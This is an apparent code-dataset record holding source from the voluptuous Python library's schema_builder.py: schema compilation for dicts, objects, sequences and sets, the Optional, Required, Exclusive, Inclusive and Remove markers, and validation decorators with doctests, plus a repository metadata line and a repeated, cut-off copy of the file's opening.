if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
'''return sort function of mappings'''
def is_extra(key_):
return key_ is Extra
def is_remove(key_):
return isinstance(key_, Remove)
def is_marker(key_):
return isinstance(key_, Marker)
def is_type(key_):
return inspect.isclass(key_)
def is_callable(key_):
return callable(key_)
# priority list for map sorting (in order of checking)
# We want Extra to match last, because it's a catch-all. On the other hand,
# Remove markers should match first (since invalid values will not
# raise an Error, instead the validator will check if other schemas match
# the same value).
priority = [(1, is_remove), # Remove highest priority after values
(2, is_marker), # then other Markers
(4, is_type), # types/classes lowest before Extra
(3, is_callable), # callables after markers
(5, is_extra)] # Extra lowest priority
def item_priority(item_):
key_ = item_[0]
for i, check_ in priority:
if check_(key_):
return i
# values have hightest priorities
return 0
return item_priority
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _merge_args_with_kwargs | python | def _merge_args_with_kwargs(args_dict, kwargs_dict):
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret | Merge args with kwargs. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1249-L1253 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
